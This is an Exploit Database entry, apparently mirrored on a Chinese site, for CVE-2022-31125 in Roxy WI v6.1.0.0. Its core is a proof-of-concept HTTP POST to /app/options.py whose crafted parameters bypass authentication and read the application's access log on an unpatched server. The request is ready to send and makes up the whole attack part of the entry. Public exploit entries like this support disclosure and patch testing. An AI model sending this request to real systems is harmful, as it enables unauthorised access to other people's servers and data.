Roxy WI v6.1.0.0 – Improper Authentication Control

• Exploit Database
• 38 阅读

• 作者： Nuri Çilengir
  日期： 2023-04-03
• 类别：

  • webapps
  平台：

  • Python
• 来源：https://www.exploit-db.com/exploits/51226/

• # Exploit Title: Roxy WI v6.1.0.0 - Improper Authentication Control
  # Date of found: 21 July 2022
  # Application: Roxy WI <= v6.1.0.0
  # Author: Nuri Çilengir
  # Vendor Homepage: https://roxy-wi.org
  # Software Link: https://github.com/hap-wi/roxy-wi.git
  # Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137
  # Tested on: Ubuntu 22.04
  # CVE : CVE-2022-31125
  
  
  # PoC
  POST /app/options.py HTTP/1.1
  Host: 192.168.56.116
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Content-Length: 105
  Origin: https://192.168.56.114
  Dnt: 1
  Referer: https://192.168.56.114/app/login.py
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: same-origin
  Te: trailers
  Connection: close
  
  alert_consumer=notNull&serv=roxy-wi.access.log&rows1=10&grep=&exgrep=&hour=00&minut=00&hour1=23&minut1=45